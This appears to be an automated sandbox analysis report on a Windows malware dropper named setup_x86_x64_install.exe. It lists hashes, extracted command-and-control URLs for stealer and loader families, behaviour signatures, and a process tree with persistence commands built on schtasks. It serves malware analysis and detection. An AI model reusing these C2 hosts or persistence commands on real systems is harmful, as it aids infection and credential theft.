Analysis
-
max time kernel
3875s -
max time network
17760s -
platform
windows10_x64 -
resource
win10-ja-20211014 -
submitted
14-11-2021 09:04
General
-
Target
setup_x86_x64_install.exe
-
Size
8.4MB
-
MD5
dc3279eab20f1e9cff2a573c1f9ef8ee
-
SHA1
049e214cd7dc62c2d409c8cc060dcd9bcc6dcfc2
-
SHA256
edceb274c572ba560f1f27c5d97991b9b56a2bce8daf617f2b4c9bbbe5008db4
-
SHA512
eaa28ef57863778175b0efc8075b7ad2909ef4d90efdc144db318d414e64ed5e0334c8fef656bd3286e05102676b780f7b754e23cf75f15797faa62fcf69fb3a
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.hhgenice.top/
Extracted
Family
amadey
Version
2.82
C2
185.215.113.45/g4MbvE/index.php
Extracted
Family
smokeloader
Version
2020
C2
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
48.3
Botnet
933
Attributes
-
profile_id
933
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Modifies system executable filetype association 2 TTPs 3 IoCs
-
Process spawned unexpected child process 9 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
-
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 64 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 7 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 17 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 22 IoCs
-
Checks for any installed AV software in registry 1 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 62 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 32 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 41 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
-
Suspicious use of SetThreadContext 18 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 20 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 4 IoCs
-
Download via BitsAdmin 1 TTPs 3 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 10 IoCs
-
Modifies Control Panel 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 28 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 23 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
-
Suspicious behavior: SetClipboardViewer 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
- Checks whether UAC is enabled
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"2⤵
-
C:\Users\Admin\Documents\aSHt86P2s_5YFZRtjtBIy6_N.exe"C:\Users\Admin\Documents\aSHt86P2s_5YFZRtjtBIy6_N.exe"3⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\Pictures\Adobe Films\OAgvQrA56nhRWjMW4rhmQtSQ.exe"C:\Users\Admin\Pictures\Adobe Films\OAgvQrA56nhRWjMW4rhmQtSQ.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\iSANXJ1aaidywClzPUibz1ax.exe"C:\Users\Admin\Pictures\Adobe Films\iSANXJ1aaidywClzPUibz1ax.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\rjzfhxZppWf9SJrXfLs6ED1W.exe"C:\Users\Admin\Pictures\Adobe Films\rjzfhxZppWf9SJrXfLs6ED1W.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\2fx87uyOfhLjxcGLoEDUwFQj.exe"C:\Users\Admin\Pictures\Adobe Films\2fx87uyOfhLjxcGLoEDUwFQj.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\oMOnHeZI4YrqbSnUmU6euCD3.exe"C:\Users\Admin\Pictures\Adobe Films\oMOnHeZI4YrqbSnUmU6euCD3.exe"4⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
-
C:\Users\Admin\Pictures\Adobe Films\oMOnHeZI4YrqbSnUmU6euCD3.exe"C:\Users\Admin\Pictures\Adobe Films\oMOnHeZI4YrqbSnUmU6euCD3.exe" -u5⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hj6SbYrTfFPdECzC6Q8JQupQ.exe"C:\Users\Admin\Pictures\Adobe Films\hj6SbYrTfFPdECzC6Q8JQupQ.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FLUIV.tmp\hj6SbYrTfFPdECzC6Q8JQupQ.tmp"C:\Users\Admin\AppData\Local\Temp\is-FLUIV.tmp\hj6SbYrTfFPdECzC6Q8JQupQ.tmp" /SL5="$1A095E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\hj6SbYrTfFPdECzC6Q8JQupQ.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BA3QF.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-BA3QF.tmp\lakazet.exe" /S /UID=27096⤵
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\e7-10ffe-c9d-75896-389d45c079afc\Raekavadaevae.exe"C:\Users\Admin\AppData\Local\Temp\e7-10ffe-c9d-75896-389d45c079afc\Raekavadaevae.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oaizewau.yw2\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\oaizewau.yw2\installer.exeC:\Users\Admin\AppData\Local\Temp\oaizewau.yw2\installer.exe /qn CAMPAIGN="654"9⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fz0cwmpy.1jl\any.exe & exit8⤵
- Checks computer location settings
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fz0cwmpy.1jl\any.exeC:\Users\Admin\AppData\Local\Temp\fz0cwmpy.1jl\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\fz0cwmpy.1jl\any.exe"C:\Users\Admin\AppData\Local\Temp\fz0cwmpy.1jl\any.exe" -u10⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fu0yg4nn.yoj\autosubplayer.exe /S & exit8⤵
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TOejPuG3Tc8hDEUA9HzlETX7.exe"C:\Users\Admin\Pictures\Adobe Films\TOejPuG3Tc8hDEUA9HzlETX7.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--AelopX6Kw"6⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c8,0x1c4,0x1c0,0x1ec,0x1bc,0x7ffd78aedec0,0x7ffd78aeded0,0x7ffd78aedee07⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1764,13122289012774251549,703901636607188823,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10924_1461247057" --mojo-platform-channel-handle=1780 /prefetch:87⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"2⤵
-
C:\Users\Admin\Documents\sD2u2z0TiOUL5z1sw3WMu24S.exe"C:\Users\Admin\Documents\sD2u2z0TiOUL5z1sw3WMu24S.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\xZWKgZiukSlyzL6jgjlHWaM1.exe"C:\Users\Admin\Pictures\Adobe Films\xZWKgZiukSlyzL6jgjlHWaM1.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\rgHF3XwhimWT8QttGvhjPay4.exe"C:\Users\Admin\Pictures\Adobe Films\rgHF3XwhimWT8QttGvhjPay4.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\dTPjatFrT8on5nYAOHF3vTnI.exe"C:\Users\Admin\Pictures\Adobe Films\dTPjatFrT8on5nYAOHF3vTnI.exe"4⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\is-4I5QL.tmp\dTPjatFrT8on5nYAOHF3vTnI.tmp"C:\Users\Admin\AppData\Local\Temp\is-4I5QL.tmp\dTPjatFrT8on5nYAOHF3vTnI.tmp" /SL5="$2005CA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\dTPjatFrT8on5nYAOHF3vTnI.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BPPDL.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-BPPDL.tmp\lakazet.exe" /S /UID=27096⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 13367⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WoiTeQWd4sDNyVQ99kfE6Dbq.exe"C:\Users\Admin\Pictures\Adobe Films\WoiTeQWd4sDNyVQ99kfE6Dbq.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Ki1qtbwzKzwp3yVTu3xIlVnO.exe"C:\Users\Admin\Pictures\Adobe Films\Ki1qtbwzKzwp3yVTu3xIlVnO.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\Ki1qtbwzKzwp3yVTu3xIlVnO.exe"C:\Users\Admin\Pictures\Adobe Films\Ki1qtbwzKzwp3yVTu3xIlVnO.exe" -u5⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\8z9QS_XbLyJhA6YadvoVSGDQ.exe"C:\Users\Admin\Pictures\Adobe Films\8z9QS_XbLyJhA6YadvoVSGDQ.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 6725⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 6925⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 7965⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 8405⤵
- Drops file in Windows directory
- Program crash
- Modifies registry class
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 8525⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 5365⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\G1PF5wisWH9YRmw_8eSJm5N2.exe"C:\Users\Admin\Pictures\Adobe Films\G1PF5wisWH9YRmw_8eSJm5N2.exe"4⤵
- Modifies Internet Explorer settings
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--AelopX6Kw"6⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c8,0x1cc,0x1d0,0x1b8,0x1d4,0x7ffd78aedec0,0x7ffd78aeded0,0x7ffd78aedee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x178,0x17c,0x180,0x110,0x184,0x7ff74f3c9e70,0x7ff74f3c9e80,0x7ff74f3c9e908⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1644,17069609008725981184,1803620983060588546,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5224_579806338" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1652 /prefetch:27⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,17069609008725981184,1803620983060588546,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5224_579806338" --mojo-platform-channel-handle=1912 /prefetch:87⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
